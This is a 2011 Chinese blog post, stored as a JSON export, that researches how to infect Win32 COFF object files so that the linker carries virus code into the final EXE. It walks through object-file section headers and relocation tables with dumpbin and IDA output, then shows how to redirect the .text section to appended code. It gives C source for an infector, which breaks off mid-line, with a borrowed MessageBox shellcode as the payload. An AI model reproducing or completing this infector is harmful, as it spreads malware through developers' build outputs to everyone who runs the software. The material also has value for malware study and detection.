{"id":404,"date":"2011-01-15T10:41:51","date_gmt":"2011-01-15T10:41:51","guid":{"rendered":""},"modified":"2011-11-18T17:11:58","modified_gmt":"2011-11-18T09:11:58","slug":"404","status":"publish","type":"post","link":"http:\/\/zerobox.org\/notes\/404.html","title":{"rendered":"Win32 coff-obj\u6587\u4ef6\u611f\u67d3\u6280\u672f\u7814\u7a76"},"content":{"rendered":"

Win32 coff-obj\u6587\u4ef6\u611f\u67d3\u6280\u672f\u7814\u7a76<\/h4>\n

By nEINEI \r\n\r\n[\u76ee\u5f55]\r\n\r\n[0x01] .\u7b80\u4ecb\r\n[0x02] .\u611f\u67d3\u601d\u8def\r\n[0x03] .coff-obj\u683c\u5f0f\r\n[0x04] .\u4fee\u6539\u5bbf\u4e3b\u6570\u636e\r\n[0x05] .code\r\n[0x06] .\u5176\u5b83\r\n\r\n[0x01] .\u7b80\u4ecb\r\n\r\n \u672c\u6587\u4ecb\u7ecd\u4e86\u5982\u4f55\u611f\u67d3win32\u5e73\u53f0\u7684coff-obj\u683c\u5f0f\u7684\u6587\u4ef6\u3002\u5728\u6ca1\u6709rebuild all\u60c5\u51b5\u4e0b\uff0c\u88ab\r\n\u611f\u67d3coff-obj\u6587\u4ef6\u5c06\u88ab\u94fe\u63a5\u5668\u4ece\u65b0\u5408\u5e76\u5230\u65b0\u6587\u4ef6\u5f53\u4e2d\uff0c\u75c5\u6bd2\u4ee3\u7801\u4e5f\u5c31\u5c06\u5bc4\u5bbf\u4e8e\u4ea7\u751f\u7684EXE\u6587\r\n\u4ef6\u4e2d\u3002\r\n\r\n[0x02] .\u611f\u67d3\u601d\u8def\r\n\r\n \u53ef\u611f\u67d3obj\u6587\u4ef6\u7684\u75c5\u6bd2\u975e\u5e38\u5c11\uff0c\u4e3b\u8981\u96c6\u4e2d\u5728\u611f\u67d3DOS\u65f6\u671f\u7684com\u6587\u4ef6\uff0c\u6700\u65e9\u7684\u611f\u67d3obj\u6587\u4ef6\r\n\u7684\u75c5\u6bd2\u662fStormbringer\u57281993\u5e74\u7f16\u5199\u7684shifter\u3002charme\u7684blog\u4e0a\u6709\u5173\u4e8e\u8fd9\u4e2a\u7684\u8be6\u7ec6\u5206\u6790\r\n\u300a\u611f\u67d3OBJ\u6587\u4ef6\u300b\u3002\u5728win32\u5e73\u53f0\u4e0b\u8c8c\u4f3c\u8fd8\u6ca1\u770b\u5230\u6709\u611f\u67d3coff-obj\u683c\u5f0f\u7684\u75c5\u6bd2\uff0c\u4e0b\u9762\u5c06\u6f14\u793a\u5982\r\n\u4f55\u53bb\u611f\u67d3coff-obj\u6587\u4ef6\u7684\u5b9e\u73b0\u601d\u8def\u3002\r\n\r\n \u4e3b\u8981\u7684\u60f3\u6cd5\uff0c\u8fd8\u662f\u8981\u83b7\u5f97coff-obj\u6587\u4ef6\u4e2d\u4ee3\u7801\u6267\u884c\u7684\u63a7\u5236\u6d41\u7a0b\uff0c\u4f46\u53d7coff-obj\u683c\u5f0f\u9650\u5236\uff0c\r\n\u4f7f\u5f97\u611f\u67d3\u65b9\u5f0f\u4e0d\u53ef\u80fd\u50cfPE\u6587\u4ef6\u90a3\u6837\u7075\u6d3b\u3002\u4f46\u4ecd\u7136\u53ef\u4ee5\u7528\u5f88\u591a\u601d\u8def\u6765\u7a81\u7834\u611f\u67d3\u8fd9\u4e9b\u74f6\u9888\u3002\r\n\r\n PE\u6587\u4ef6\u7684\u4e3b\u8981\u611f\u67d3\u601d\u8def coff-obj\r\n\r\n 1 \u611f\u67d3\u6587\u4ef6\u5934 \u5934\u90e8\u65e0\u53ef\u64cd\u4f5c\u7a7a\u95f4\r\n 2 \u4fee\u6539EOP \u6ca1\u6709EOP\u7684\u6982\u5ff5\r\n 3 \u6dfb\u52a0\u65b0\u8282 \u53ef\u4ee5\u5c1d\u8bd5\r\n 4 EPO\uff08\u5165\u53e3\u6a21\u7cca\uff09 \u53ef\u4ee5\u5c1d\u8bd5\r\n 5 hook \u5bfc\u5165\u8868 \u53ef\u4ee5\u5c1d\u8bd5\r\n 6 PE\u6346\u7ed1 \u94fe\u63a5\u5668\u6267\u884c\u4f1a\u51fa\u95ee\u9898\r\n 7 ... ...\r\n\r\n \u8fd9\u91cc\u91c7\u7528\u6bd4\u8f83\u7a33\u59a5\u7684\u65b9\u5f0f\u6765\u83b7\u5f97\u63a7\u5236\u6d41\u7a0b\uff0c\u5c31\u662f\u91cd\u65b0\u6784\u9020\u4e00\u4e2acof-obj\u683c\u5f0f\u7684.text\u6bb5\u6765\r\n\u83b7\u5f97\u63a7\u5236\u6d41\u7a0b\uff0c\u4e0b\u9762\u5148\u770b\u4e00\u4e0bcoff-obj\u7684\u6587\u4ef6\u683c\u5f0f\u3002\r\n\r\n[0x03] .coff-obj\u683c\u5f0f\r\n\r\n coff-obj \u6587\u4ef6\u683c\u5f0f\u6bd4\u8f83\u6e05\u6670\uff0c\u7531\u6587\u4ef6\u5934+\u53ef\u9009\u5934+\u6bb5+\u6570\u636e+\u91cd\u5b9a\u4f4d+\u7b26\u53f7\u7ec4\u6210\u3002\u5bf9obj\u6587\r\n\u4ef6\u6765\u8bf4\u662f\u6ca1\u6709\u53ef\u9009\u5934\u7684\u6982\u5ff5\u7684\uff0c\u6240\u4ee5\u540e\u9762\u63d0\u5230\u7684coff-obj\u4e13\u6307\u751f\u6210\u7684\u76ee\u6807\u6587\u4ef6\u683c\u5f0f\uff0c\u7b80\u79f0obj\uff0c\r\n\u4e0b\u9762\u662f\u8981\u6784\u9020\u4e00\u4e2a\u65b0\u7684.text\u6bb5\u7684\u793a\u610f\u56fe\uff0c\u5b9e\u9645\u6bb5\u7684\u6392\u5217\u548c\u91cd\u5b9a\u4f4d\u7684\u6570\u636e\u662f\u6df7\u5408\u7684\uff0c\u6b64\u5904\u4ec5\u662f\r\n\u4e3a\u4e86\u65b9\u4fbf\u63cf\u8ff0\uff0c\u7b80\u5316\u5904\u7406\u4e86\u3002\r\n\r\n\t +--------------+\r\n\t | FILEHDR |\r\n\t +--------------+\r\n\t | SECHDR1 | -----------\u5047\u8bbe\u6b64\u5904\u662f\u539f.text\u6bb5\uff0c\u4fee\u6539\u8282\u6570\u636e\u4f7f\u5b83\u6307\u5411\u65b0\u7684\u6dfb\u52a0\u6570\u636e\r\n\t +--------------+ |\r\n\t | SECHDR2 | |\r\n\t +--------------+ |\r\n\t | ... | |\r\n\t +--------------+ |\r\n\t | SECHDR N | |\r\n\t +--------------+ |\r\n\t | SECDATE | |\r\n\t +--------------+ |\r\n\t | LINE | |\r\n\t +--------------+ |\r\n\t | Symbol | |\r\n\t +--------------+ |\r\n\t | String | |\r\n\t +--------------+ |\r\n\t | new data | <----------.\r\n\t +--------------+ \r\n\r\n \u4e0b\u9762\u4f7f\u7528\u4e00\u4e2a\u7b80\u5355\u7684c\u7a0b\u5e8ft_obj\u6765\u8be6\u7ec6\u8bf4\u660eobj\u683c\u5f0f\u3002\r\n\r\n\/\/----------------------------------------------------------------------\r\n\t\t\t#include <stdio.h>\r\n\t\t\tint main()\r\n\t\t\t{\r\n\t\t\t\tchar *title = \"hello world!\";\r\n\t\t\t\tprintf(title);\r\n\t\t\t}\r\n\/\/----------------------------------------------------------------------\t\t\t\r\n\r\n\t cmd > dumpbin \/all \/disasm t_obj.obj\r\n\r\n \u622a\u53d6\u4e3b\u8981\u90e8\u5206\u6253\u5370\u6570\u636e\uff1a\r\n\r\n\/\/-------------------------------- \u6587\u4ef6\u5934 -------------------------------\r\nFILE HEADER VALUES\r\n\t 14C machine (i386)\r\n\t 4 number of sections *** \u91cd\u8981\u7684\u7ed3\u6784\uff0c\u8fd9\u544a\u8bc9\u6211\u4eec\u8fd9\u4e2aobj\u6587\u4ef6\u6709\u51e0\u4e2a\u6bb5\uff0c\u800c\u6211\u4eec\u5173\u5fc3\u7684\u5c31\u662f.text\u6bb5\r\n\t4C6DF71D time date stamp\r\n\t 125 file pointer to symbol table\r\n\t 10 number of symbols\r\n\t 0 size of optional header\r\n\t 0 characteristics\r\n\r\n\/\/-------------------------------- .drectve\u6bb5 -----------------------------\r\n\/\/----\u8be5\u6bb5\u5728obj\u6587\u4ef6\u88ablink\u8fc7\u7a0b\u4e2d\u4f1a\u88ab\u820d\u5f03\u6389\uff0c\u4e3b\u8981\u63d0\u4f9b\u7ed9link\u7684\u547d\u4ee4\u53c2\u6570-------\r\n\r\nSECTION HEADER #1\r\n.drectve name\r\n 0 physical address\r\n 0 virtual address\r\n 26 size of raw data\r\n B4 file pointer to raw data\r\n 0 file pointer to relocation table\r\n 0 file pointer to line numbers\r\n 0 number of relocations\r\n 0 number of line numbers\r\n 100A00 flags\r\n Info\r\n Remove\r\n 1 byte align\r\n\r\nRAW DATA #1\r\n 00000000: 2D 64 65 66 61 75 6C 74 6C 69 62 3A 4C 49 42 43 -defaultlib:LIBC\r\n 00000010: 20 2D 64 65 66 61 75 6C 74 6C 69 62 3A 4F 4C 44 -defaultlib:OLD\r\n 00000020: 4E 41 4D 45 53 20 NAMES \r\n\r\n Linker Directives\r\n -----------------\r\n -defaultlib:LIBC\r\n -defaultlib:OLDNAMES\r\n\r\n\/\/-------------------------------- .text\u6bb5 -----------------------------\r\n\r\nSECTION HEADER #2\r\n\t .text name\r\n\t 0 physical address\r\n\t 0 virtual address\r\n\t 10 size of raw data -----> \u6bb5\u957f\u5ea6\uff0c\u4e5f\u5c31\u662f\u5b9e\u9645\u7f16\u7801\u957f\u5ea6\r\n\t DA file pointer to raw data -----> .text\u4e2d\u4ee3\u7801\uff0c\u76f8\u5bf9\u6587\u4ef6\u5934\u90e8\u7684\u504f\u79fb\r\n\t EA file pointer to relocation table -----> \u6307\u5411.text\u4e2d\u9700\u8981\u91cd\u5b9a\u4f4d\u7684\u6570\u636e\u6307\u9488\r\n\t 0 file pointer to line numbers\r\n\t 2 number of relocations -----> .text\u4e2d\u4ee3\u7801\uff0c\u9700\u8981\u88ab\u4fee\u6b63\u7684\u91cd\u5b9a\u4f4d\u6570\u91cf\r\n\t 0 number of line numbers\r\n\t60501020 flags\r\n\t Code\r\n\t Communal; sym= _main\r\n\t 16 byte align\r\n\t Execute Read\r\n\r\n_main:\r\n 00000000: 68 00 00 00 00 push offset _main ---->\u6b64\u5904\u504f\u79fb\u662f0x00000000\uff0c\u8fd8\u6ca1\u6709\u88ab\u91cd\u5b9a\u4f4d\r\n 00000005: E8 00 00 00 00 call 0000000A ---->\u6b64\u5904\u504f\u79fb\u662f0x00000000\uff0c\u8fd8\u6ca1\u6709\u88ab\u91cd\u5b9a\u4f4d\r\n 0000000A: 59 pop ecx\r\n 0000000B: C3 ret\r\n 0000000C: 90 nop\r\n 0000000D: 90 nop\r\n 0000000E: 90 nop\r\n 0000000F: 90 nop\r\n\r\nRAW DATA #2\r\n 00000000: 68 00 00 00 00 E8 00 00 00 00 59 C3 90 90 90 90 h.........Y.....\r\n\r\n \u5177\u4f530x68\uff0c0xe8\u540e\u9762\u7684\u503c\u9700\u8981\u7531\u7f16\u8bd1\u5668\u6765\u7edd\u5bf9\u3002\r\n\r\n\/\/--------------------- .text\u6bb5\u4e2d\u7684\u88ab\u4fee\u6b63\u7684\u91cd\u5b9a\u4f4d\u8868 --------------------\r\n\/\/\u6700\u7ec8\u4ee3\u7801\u5c31\u662f\u6839\u636e\u8be5\u8868\u4e2d\u7684\u503c\u7ed9\u94fe\u63a5\u5668\u63d0\u4f9b\u4fe1\u606f\u505a\u6700\u540e\u7684\u91cd\u5b9a\u4f4d\u4f9d\u636e\r\n\r\nRELOCATIONS #2\r\n Symbol Symbol\r\n Offset Type Applied To Index Name\r\n -------- ---------------- ----------------- -------- ------\r\n 00000001 DIR32 00000000 D ??_C@_0N@NHHG@hello?5world?$CB?$AA@ (`string\")\r\n 00000006 REL32 00000000 A _printf\r\n\r\n \u8fd9\u91cc\u8bf4\u4e00\u4e0b\uff0c\u91cd\u5b9a\u4f4d\u7684\u7c7b\u578b\u67093\u7c7b\uff1a\r\n\r\nDIR32 ---> \u76f4\u63a5\u91cd\u5b9a\u4f4d\uff0c\u591a\u662f\u5b57\u7b26\u4e32\u4e00\u7c7b\u60c5\u51b5\uff0c\u9700\u8981\u6709\u94fe\u63a5\u5668\u6700\u7ec8\u5b9a\u4f4d\u5177\u4f53\u7684\u865a\u62df\u5730\u5740\u503c\r\nREL32 ---> \u76f8\u5bf9\u91cd\u5b9a\u4f4d\uff0c\u5f53\u524dopcode\uff0c\u76f8\u5bf9\u4e8e\u8981\u8df3\u8f6c\u7684\u51fd\u6570\u7684\u76f8\u5bf9\u504f\u79fb\u503c\r\nDIR32NB ---> \u4f9b\u8c03\u8bd5\u4fe1\u606f\u4f7f\u7528\uff0c\u4e0eDIR32\u7684\u533a\u522b\u662f\u91cd\u5b9a\u4f4d\u503c\u4e0d\u5305\u542b\u53ef\u6267\u884c\u6587\u4ef6\u7684\u9ed8\u8ba4\u52a0\u8f7d\u5730\u5740\r\n\r\n 00000001\uff0c00000006\u8868\u793a\u76f8\u5bf9.text\u4ee3\u7801\u5904\u8981\u4fee\u6b63\u7684\u4f4d\u7f6e\u504f\u79fb\uff0c\u4e5f\u5c31\u662f[]\u62ec\u8d77\u6765\u7684\u90e8\u5206\r\n\r\n00000000: 68 [00] 00 00 00 push offset _main\r\n00000005: E8 [00] 00 00 00 call 0000000A \r\n\r\n\/\/-------------------------------- .data\u6bb5 -----------------------------\r\n\r\nSECTION HEADER #3\r\n .data name\r\n 0 physical address\r\n 0 virtual address\r\n D size of raw data\r\n FE file pointer to raw data\r\n 0 file pointer to relocation table\r\n 0 file pointer to line numbers\r\n 0 number of relocations\r\n 0 number of line numbers\r\nC0301040 flags\r\n Initialized Data\r\n Communal; sym= \"`string\"\" (??_C@_0N@NHHG@hello?5world?$CB?$AA@)\r\n 4 byte align\r\n Read Write\r\n\r\nRAW DATA #3\r\n 00000000: 68 65 6C 6C 6F 20 77 6F 72 6C 64 21 00 hello world!. \r\n\r\n \u6570\u636e\u7684\u4f4d\u7f6e\u6700\u540e\u7531\u94fe\u63a5\u5668\u6765\u5b9a\u4e49\u3002\r\n\r\n\/\/------------------------------------------------------------------------------\t\r\n\r\n \u4e0b\u9762\u770b\u4e00\u4e0bt_obj.obj\u5728IDA\u4e2d\u7684\u663e\u793a\u60c5\u51b5:\r\n\r\n\t\t.text:00000000 public _main\r\n\t\t.text:00000000 _main proc near\r\n\t\t.text:00000000 68 10 00 00 00 push offset ??_C@_0N@NHHG@hello?5world?$CB?$AA@ ; \"hello world!\"\r\n\t\t.text:00000005 E8 16 00 00 00 call _printf\r\n\t\t.text:0000000A 59 pop ecx\r\n\t\t.text:0000000B C3 retn\r\n\t\t.text:0000000B _main endp\r\n\r\n IDA\u6839\u636e\u91cd\u5b9a\u4f4d\u8868\u7684\u683c\u5f0f\uff0c\u5bf9.text\u6bb5\u5206\u522b\u4fee\u6b63\u4e3a0x10 \uff0c0x16 \u4e24\u4e2a\u504f\u79fb\u3002\u540c\u65f6\u5f53\u4f60\u589e\u52a0\r\n.text coe\u5927\u5c0f\u65f6\uff0c\u94fe\u63a5\u5668\u4f1a\u81ea\u52a8\u8c03\u6574.data\u7684\u4f4d\u7f6e\u3002\r\n\r\n\/\/------------------------------------------------------------------------------\t\r\n\r\n \u6700\u7ec8\u751f\u6210\u7684t_obj.EXE\u6587\u4ef6\u663e\u793a\u60c5\u51b5\r\n\r\n\t\t00401000 \/$ 68 30704000 push t_obj.00407030 ; ASCII \"hello world!\"\r\n\t\t00401005 |. E8 06000000 call t_obj.00401010\r\n\t\t0040100A |. 59 pop ecx\r\n\t\t0040100B . C3 retn\r\n\r\n \u5b57\u7b26\u4e32\"hello world!\" \u88ab\u5b9a\u4f4d\u5230\u4e860x00407030\r\n print \u51fd\u6570\u88ab\u5b9a\u4f4d\u5230\u76f8\u5bf9\u504f\u79fb0x05 + 0x6 = 0x0b \u7684\u4f4d\u7f6e\uff0c\u4e5f\u5373\u662f\u865a\u62df\u5730\u5740\u4e3a401010\r\n\r\n \u6b64\u65f6\u6211\u4eec\u77e5\u9053\uff0c\u5982\u679c\u8981\u4fee\u6539obj\u6587\u4ef6\u7684.text\u4ee3\u7801\u662f\u8981\u6ce8\u610f\u7684\uff0c\u8981\u907f\u514d\u4fee\u6539\u5230\u91cd\u5b9a\u4f4d\u7684\u90e8\r\n\u5206\uff0c\u5426\u5219\u4f60\u7684\u4ee3\u7801\u4e5f\u4f1a\u88ab\u94fe\u63a5\u5668\u6539\u5199\u3002\r\n\r\n[0x04] .\u4fee\u6539\u5bbf\u4e3b\u6570\u636e\r\n\r\n 1. \u4fee\u6539.text\u7ed3\u6784\u4f7f\u5176\u6307\u5411\u65b0\u52a0\u5165\u7684\u75c5\u6bd2\u4ee3\u7801\u4f4d\u7f6e\uff0c\u4e0b\u9762\u662f\u6bb5\u7684\u7ed3\u6784\u4f53\u7c7b\u578b\uff1a\r\n\r\n\t\ttypedef struct _sec_hdr\r\n\t\t{\r\n\t\t\tchar c_name[8]; \/\/ \u6bb5\u540d\r\n\t\t\tunsigned long ul_v_size; \/\/ \u865a\u62df\u5927\u5c0f\r\n\t\t\tunsigned long ul_v_addr; \/\/ \u865a\u62df\u5730\u5740\r\n\t\t\tunsigned long ul_sec_size; \/\/ \u6bb5\u957f\u5ea6\r\n\t\t\tunsigned long ul_sec_off; \/\/ \u6bb5\u6570\u636e\u504f\u79fb\r\n\t\t\tunsigned long ul_rel_off; \/\/ \u6bb5\u91cd\u5b9a\u4f4d\u8868\u504f\u79fb\r\n\t\t\tunsigned long ul_lno_off; \/\/ \u884c\u53f7\u8868\u504f\u79fb\r\n\t\t\tunsigned short ul_num_rel; \/\/ \u91cd\u5b9a\u4f4d\u8868\u4e2a\u6570\r\n\t\t\tunsigned short ul_num_ln; \/\/ \u884c\u53f7\u8868\u957f\u5ea6\r\n\t\t\tunsigned long ul_flags; \/\/ \u6bb5\u6807\u8bc6\r\n\t\t}sec_hdr;\r\n\r\n ul_sec_size --> \u4fee\u6539\u4e3a\u539f\u4ee3\u7801\u7684\u957f\u5ea6+\u75c5\u6bd2\u4ee3\u7801\u957f\u5ea6+\u91cd\u5b9a\u4f4d\u8868\u957f\u5ea6\r\n ul_sec_off --> \u6307\u5411\u6587\u4ef6\u672b\u5c3e\r\n\r\n 2. \u5728\u5206\u6790\u4e2d\u53d1\u73b0\u4e00\u4e2a\u95ee\u9898\uff0c\u5982\u679c\u628a\u539f.text\u7684\u4ee3\u7801\u62f7\u8d1d\u5230\u65b0\u7684\u7a7a\u95f4\u4e2d\u800c\u4e0d\u62f7\u8d1d\u91cd\u5b9a\u4f4d\u6570\r\n\u636e\uff0c\u4f1a\u5bfc\u81f4\u94fe\u63a5\u5668\u65e0\u6cd5\u6267\u884c\u3002\u751f\u6210\u7684EXE\u6587\u4ef6\u4e5f\u65e0\u6cd5\u6267\u884c\uff0c\u56e0\u4e3a\u90a3\u90e8\u5206\u6570\u636e\u88ab\u75c5\u6bd2\u4ee3\u7801\u586b\u5145\uff0c\r\n\u94fe\u63a5\u5668\u65e0\u6cd5\u89e3\u6790\u3002\r\n\r\n \u867d\u7136.text \u7684\u4ee3\u7801\u90e8\u5206\u957f\u5ea6\u5e76\u4e0d\u5305\u62ec\u91cd\u5b9a\u4f4d\u90e8\u5206\u957f\u5ea6\uff0c\u4e14\u5305\u62ec\u6307\u5411\u6bb5\u5185\u91cd\u5b9a\u4f4d\u8868\u504f\u79fb\u7684\r\n\u6307\u9488\uff0c\u94fe\u63a5\u5668\u53ef\u4ee5\u6839\u636e\u539f\u6709\u90a3\u4e2a\u8868\u8fdb\u884c\u91cd\u5b9a\u4f4d\u64cd\u4f5c\uff0c\u4f46\u5b9e\u9645\u60c5\u51b5\u662f\uff0c\u94fe\u63a5\u5668\u4f1a\u56e0\u4e3a\u4f60\u7684\u4fee\u6539\uff0c\r\n\u628a\u539f\u6709\u6570\u636e\u91cd\u5b9a\u4f4d\u5f04\u9519\u8bef\uff0c\u5728IDA\u4e2d\u89c2\u5bdf\u662f\u6ca1\u6709\u95ee\u9898\u7684\uff0c\u4f46\u6700\u7ec8\u751f\u6210\u7684EXE\u6587\u4ef6\u662f\u5b8c\u5168\u6df7\u4e71\u7684\u3002\r\n\r\n \u6240\u4ee5\u6211\u7684\u4e00\u4e2a\u731c\u6d4b\u662f\u6bb5\u7ed3\u6784\u4e2d\u7684\u91cd\u5b9a\u4f4d\u504f\u79fb\u4ec5\u662f\u63d0\u4f9b\u7ed9\u5916\u90e8\u7a0b\u5e8f\u89e3\u6790\u53c2\u8003\u7528\u7684\uff08\u5982IDA\uff0c\r\ndumpbin\uff09\uff0c\u800c\u94fe\u63a5\u5668\u53ea\u63a5\u53d7\u9ed8\u8ba4.text\u540e\u9762\u5c31\u662f\u91cd\u5b9a\u4f4d\u8868\u7684\u4e8b\u5b9e\u3002\u6240\u4ee5\u4e3a\u4e86\u80fd\u6267\u884c\u6210\u529f\uff0c\u6211\r\n\u4eec\u8fd8\u662f\u628a\u91cd\u5b9a\u4f4d\u90e8\u5206\u62f7\u8d1d\u8fc7\u53bb\uff0c\u6240\u4ee5\u6211\u4eec\u65b0\u589e\u6570\u636e\u7684\u957f\u5ea6\u662f\u4ee5\u4e0a3\u90e8\u5206\u7684\u957f\u5ea6\u603b\u548c\u3002\r\n\r\n 3. \u4fee\u6539\u539f\u6709\u4ee3\u7801\uff0c\u4f7f\u5176\u8df3\u5411\u75c5\u6bd2\u4ee3\u7801\u3002\r\n\r\n _main:\r\n 00000000: 68 00 00 00 00 push offset _main\r\n 00000005: E8 00 00 00 00 call 0000000A\r\n 0000000A: 59 pop ecx\r\n 0000000B: C3 ret ----------------\r\n 0000000C: 90 nop |\r\n 0000000D: 90 nop |\r\n 0000000E: 90 nop |\r\n 0000000F: 90 nop |\r\n ... \u6ce8\u610f\u6b64\u5904\u662f\u91cd\u5b9a\u4f4d\u8868\u7684\u6570\u636e\uff0c\u8981\u8df3\u8fc7\u8be5\u90e8\u5206\u957f\u5ea6 | |\r\n |\r\n 000000xx: nop <----------------------------------\/\r\n 000000xx: nop\r\n 000000xx: nop\r\n ...virus code \r\n\r\n 4. \u8fd4\u56de\u539f\u4ee3\u7801\u90e8\u5206\r\n\r\n \u7b80\u5355\u7684\u60c5\u51b5\uff0c\u53ef\u76f4\u63a5\u5728\u75c5\u6bd2\u4ee3\u7801\u4e2dret\u8fd4\u56de\u5373\u53ef\uff0c\u5bbf\u4e3b\u60c5\u51b5\u590d\u6742\u7684\u8bdd\uff0c\u9700\u8981\u8ba1\u7b97\u597d\u504f\u79fb\r\n\u91cd\u65b0\u8df3\u56de\u53bb\u3002\r\n\r\n 5. \u611f\u67d3\u540e\u7684\u60c5\u51b5\r\n\r\n SECTION HEADER #2\r\n .text name\r\n 0 physical address\r\n 0 virtual address\r\n D9 size of raw data ----> \u957f\u5ea6\u5df2\u7ecf\u88ab\u91cd\u65b0\u8ba1\u7b97\r\n 26D file pointer to raw data ----> \u6307\u5411\u4e86\u6587\u4ef6\u672b\u5c3e\r\n EA file pointer to relocation table ----> \u6ca1\u6709\u4fee\u6539\u539f\u6709\u91cd\u5b9a\u4f4d\u8868\r\n 0 file pointer to line numbers\r\n 2 number of relocations\r\n 0 number of line numbers\r\n60501020 flags\r\n Code\r\n Communal; sym= _main\r\n 16 byte align\r\n Execute Read\r\n\r\n_main:\r\n 00000000: 68 00 00 00 00 push offset _main\r\n 00000005: E8 00 00 00 00 call 0000000A\r\n 0000000A: 59 pop ecx\r\n 0000000B: EB 1C jmp 00000029 -------------------\r\n 0000000D: 00 00 add byte ptr [eax],al |\r\n 0000000F: 00 01 add byte ptr [ecx],al |\r\n 00000011: 00 00 add byte ptr [eax],al |\r\n 00000013: 00 0D 00 00 00 06 add byte ptr ds:[6000000h],cl |\r\n 00000019: 00 06 add byte ptr [esi],al |\r\n 0000001B: 00 00 add byte ptr [eax],al |\r\n 0000001D: 00 0A add byte ptr [edx],cl |\r\n 0000001F: 00 00 add byte ptr [eax],al |\r\n 00000021: 00 14 00 add byte ptr [eax+eax],dl |\r\n 00000024: 68 65 6C 6C 90 push 906C6C65h |\r\n 00000029: 90 nop <----------------------------------\/ \u8df3\u5411\u4e86\u6211\u4eec\u60f3\u8981\u6267\u884c\u7684\u4ee3\u7801\r\n 0000002A: 90 nop\r\n 0000002B: 90 nop\r\n 0000002C: 90 nop\r\n 0000002D: 90 nop\r\n 0000002E: 90 nop\r\n 0000002F: 90 nop\r\n 00000030: 90 nop\r\n 00000031: FC cld\r\n 00000032: 68 6A 0A 38 1E push 1E380A6Ah\r\n 00000037: 68 63 89 D1 4F push 4FD18963h\r\n 0000003C: 68 32 74 91 0C push 0C917432h\r\n 00000041: 8B F4 mov esi,esp\r\n 00000043: 8D 7E F4 lea edi,[esi-0Ch]\r\n ...\r\n\r\n[0x05] .code\r\n\r\n \u4ee3\u7801\u6f14\u793a\u7684\u90e8\u5206\u4ec5\u5f39\u51fa\u4e00\u4e2aMessageBox\uff0c\u6211\u6bd4\u8f83\u61d2\uff0c\u6240\u4ee5\u5077\u61d2\u7528failwest\u7684\u4e00\u4e2ashellcode_popup_general\r\n\u4ee3\u7801\uff08thx ^_^\uff09\u7a0d\u4f5c\u4fee\u6539\u3002 \r\n\r\n\/\/------------------------------------------------------------------------------\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <malloc.h>\r\nvoid vir_code(void);\r\nvoid vir_code_end(void);\r\nint main(int argc, char* argv[])\r\n{\r\n\tFILE *h = 0;\r\n\tunsigned char *buf = 0;\r\n\tint numread = 0;\r\n\tint i = 0;\r\n\tint f_size = 0;\r\n\tint vir_size = 0;\r\n\tint a_size = 0;\r\n\tint tx_off = 0;\r\n\r\n\t\/\/ coff-obj \u6587\u4ef6\u5934\u7ed3\u6784\r\n\ttypedef struct _coff_obj_header\r\n\t{\r\n\t\tshort int magic;\r\n\t\tshort int sections;\r\n\t\tlong t_stamp;\r\n\t\tlong symbol_to_pointer;\r\n\t\tlong symbol_to_number;\r\n\t\tshort int optional_header;\r\n\t\tshort int flgs;\r\n\t}coff_obj_header;\r\n\r\n\ttypedef struct _sec_hdr\r\n\t{\r\n\t\tchar c_name[8]; \/\/ \u6bb5\u540d\r\n\t\tunsigned long ul_v_size; \/\/ \u865a\u62df\u5927\u5c0f\r\n\t\tunsigned long ul_v_addr; \/\/ \u865a\u62df\u5730\u5740\r\n\t\tunsigned long ul_sec_size; \/\/ \u6bb5\u957f\u5ea6\r\n\t\tunsigned long ul_sec_off; \/\/ \u6bb5\u6570\u636e\u504f\u79fb\r\n\t\tunsigned long ul_rel_off; \/\/ \u6bb5\u91cd\u5b9a\u4f4d\u8868\u504f\u79fb\r\n\t\tunsigned long ul_lno_off; \/\/ \u884c\u53f7\u8868\u504f\u79fb\r\n\t\tunsigned short ul_num_rel; \/\/ \u91cd\u5b9a\u4f4d\u8868\u4e2a\u6570\r\n\t\tunsigned short ul_num_ln; \/\/ \u884c\u53f7\u8868\u957f\u5ea6\r\n\t\tunsigned long ul_flags; \/\/ \u6bb5\u6807\u8bc6\r\n\t}sec_hdr;\r\n\r\n\ttypedef struct _reloc_s\r\n\t{\r\n\t\tunsigned long ul_off; \/\/ \u5b9a\u4f4d\u504f\u79fb\r\n\t\tunsigned long ul_symbol; \/\/ \u7b26\u53f7\r\n\t\tunsigned short us_type; \/\/ \u5b9a\u4f4d\u7c7b\u578b\r\n\t}reloc_s;\r\n\r\n\tcoff_obj_header coh_buf;\r\n\tsec_hdr sh;\r\n\r\n\tlong tx_rel_off;\r\n\tlong tx_rel_len;\r\n\tlong txt_len;\r\n\tlong txt_off;\r\n\r\n\tif (argc <2)\r\n\t{\r\n\t\tprintf(\"please enter the obj file path to infection\r\n\");\r\n\t\treturn 0;\r\n\t}\r\n\r\n\tif (0 == (h = fopen(argv[1],\"r+\")))\r\n\t{\r\n\t\tprintf(\"the file %s was not opened\r\n\",argv[2]);\r\n\t\treturn 0;\r\n\t}\r\n\r\n\tfseek(h,0,SEEK_END);\r\n\tf_size = ftell(h);\r\n\tfseek(h,0,SEEK_SET);\r\n\r\n\tnumread = fread(&coh_buf,sizeof (coff_obj_header),1,h);\r\n\r\n\tfor(i = 0 ; i < coh_buf.sections;i++)\r\n\t{\r\n\t\tfread(&sh,sizeof(sec_hdr),1,h);\r\n\r\n\t\tif (0 == strnicmp(\".text\",sh.c_name,5))\r\n\t\t{\r\n\t\t\ttx_off = sizeof(coff_obj_header) + i * sizeof(sec_hdr);\r\n\t\t\ttxt_off = sh.ul_sec_off;\r\n\t\t\ttxt_len = sh.ul_sec_size;\r\n\r\n\t\t\t\/\/\u8bfb\u53d6\u91cd\u5b9a\u4f4d\u8868\u6570\u636e\r\n\t\t\ttx_rel_off = sh.ul_rel_off;\r\n\t\t\ttx_rel_len = sh.ul_num_rel * sizeof(reloc_s);\r\n\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\r\n\t\/\/ \u6784\u9020\u4e00\u4e2a\u65b0\u7684obj\u7f13\u51b2\u533a\r\n\tvir_size = (int)((int)&vir_code_end - (int)&vir_code);\r\n\r\n\ta_size = f_size + vir_size + tx_rel_len + 1;\r\n\tbuf = (unsigned char *)malloc(a_size);\r\n\r\n\tmemset(buf,0,f_size + vir_size +1);\r\n\r\n\tfseek(h,0,SEEK_SET);\r\n\tfread(buf,sizeof(unsigned char),f_size,h);\r\n\tfclose(h);\r\n\th = 0;\r\n\r\n\t\/\/ \u4fee\u6539text\u8282\u7684\u6267\u884c\r\n\t\/\/ \u5c06\u539f\u6709.text\u6570\u636e\u5b9a\u4f4d\u7684\u6587\u4ef6\u5c3e\u90e8\r\n\r\n\tprintf(\"buff 